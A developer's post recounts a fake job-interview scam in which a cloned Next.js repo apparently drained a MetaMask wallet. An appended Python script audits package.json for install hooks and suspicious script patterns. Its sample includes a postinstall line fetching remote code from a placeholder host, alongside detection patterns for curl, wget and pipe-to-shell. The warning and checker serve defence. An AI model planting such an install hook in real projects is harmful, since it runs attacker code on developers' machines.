Recently, I received an invitation for an interview regarding a job post: upwork.com/jobs/~01fb0cb0 As mentioned in the job post, it's an ongoing project. So, as usual, the client sent me the repo of the project: bitbucket.org/juandsuareza/m He also sent me a screen recording (drive.google.com/file/d/1uLLOF5) pointing out the bug/issue in the existing project, and asked me whether I was also seeing the same thing after running the project locally.

As you can see, the repo doesn't look suspicious at all (especially in the eyes of regular devs). So, I cloned the repo and started executing it locally. Once it was running on localhost, it opened like a normal Next.js app in the browser. Trust me, everything was completely unsuspicious. However, here comes the twist: all of a sudden, it started asking for permissions to access browser cache, notes, reminders and what not. To be very honest, I denied all of them, as it started looking a lot suspicious all of a sudden, and I closed and deleted the project completely.

I immediately checked my bank accounts using my phone via dedicated banking apps (as I never access any of my bank accounts via browser or laptop). But then, when I checked my MetaMask, all of my funds on all the mainnet accounts were gone. Luckily, I was/am not holding any crypto for investment purposes; whatever was there, around $60, was for various testing purposes, mainly in Polygon MATIC. These were the transactions that happened: polygonscan.com/tx/0xf0b72d445 etherscan.io/tx/0x44ce9e9a0 Funny enough, in the second transaction you can see the scammer spent around $4 in transaction fees to transfer $1 worth of Ethereum. Clearly not an expert scammer, for sure!

So, the entire motive for sharing this incident is to alert all of my fellow #developers and advise them to stay safe by never executing any project/code provided by a stranger, no matter how safe it looks.
I would also like to encourage the #web3security experts to push even harder in spreading more and more awareness regarding the best practices and measures to take, and how to safeguard ourselves against such out-of-bounds and out-of-league #scams.
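The post does not say how the cloned project drained the wallet, so as an added example (not the author's code, and not from the repository mentioned) here is one routine pre-run check for any cloned JavaScript project: audit package.json before `npm install`, because lifecycle hooks such as `postinstall` execute automatically during installation. The package.json below is constructed for the example and `example.invalid` is a placeholder host.

```python
import json
import re

# npm lifecycle hooks that run automatically during `npm install`,
# before the developer has explicitly started anything.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Script-body patterns that deserve a manual look before the project is run.
SUSPICIOUS_SCRIPT_PATTERNS = {
    "remote fetch": re.compile(r"\b(curl|wget)\b|https?://"),
    "pipe to interpreter": re.compile(r"\|\s*(sh|bash|node|python3?)\b"),
    "inline eval": re.compile(r"\bnode\s+-e\b|\beval\b"),
}

# Dependency specs that bypass the npm registry (git/http/local paths).
NON_REGISTRY_SPEC = re.compile(r"^(git\+|git:|https?://|github:|file:)")


def audit_package_json(text):
    """Return a list of human-readable findings for one package.json body."""
    pkg = json.loads(text)
    findings = []
    scripts = pkg.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"lifecycle hook '{hook}' runs on install: {scripts[hook]}")
    for name, body in scripts.items():
        for label, pattern in SUSPICIOUS_SCRIPT_PATTERNS.items():
            if pattern.search(body):
                findings.append(f"script '{name}' matches '{label}': {body}")
    for section in ("dependencies", "devDependencies"):
        for dep, spec in pkg.get(section, {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append(f"{section}.{dep} is not a registry version: {spec}")
    return findings


# Constructed sample: a Next.js-looking package.json with a postinstall hook
# that pulls remote code and a dependency fetched straight from a git URL.
SAMPLE_PACKAGE_JSON = """{
  "name": "demo-app",
  "scripts": {
    "dev": "next dev",
    "build": "next build",
    "postinstall": "node -e \\"require('https').get('https://example.invalid/x.js')\\""
  },
  "dependencies": {
    "next": "13.4.0",
    "react": "18.2.0",
    "utils-helper": "git+https://example.invalid/repo.git"
  }
}"""

if __name__ == "__main__":
    for finding in audit_package_json(SAMPLE_PACKAGE_JSON):
        print("WARNING:", finding)
```

Run it against each package.json in a cloned repo (including workspaces) before installing; an empty result is not a clean bill of health, only the absence of the obvious red flags listed above.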